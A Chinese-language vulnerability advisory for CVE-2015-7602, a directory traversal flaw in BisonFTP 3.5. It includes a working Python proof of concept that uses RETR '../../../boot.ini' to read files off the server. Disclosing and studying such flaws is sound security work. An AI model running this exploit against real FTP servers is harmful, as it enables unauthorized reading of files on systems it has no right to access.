BisonWare BisonFTP信息泄露漏洞(CVE-2015-7602)
发布日期:2015-09-29
更新日期:2015-09-30
受影响系统:BisonWare BisonFTP 3.5
描述:
CVE(CAN) ID:
CVE-2015-7602
BisonFTP是一款FTP服务程序。
BisonWare BisonFTP 3.5版本存在目录遍历漏洞,远程攻击者通过RETR命令内的"../ ",利用此漏洞可读取任意文件。
<*来源:Jay Turla
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jay Turla ()提供了如下测试方法:
#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software link:
https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar
# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
建议:
厂商补丁:
BisonWare
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://bisonware-ftp-server.software.informer.com/3.5/浏览次数:2203
严重程度:0(网友投票)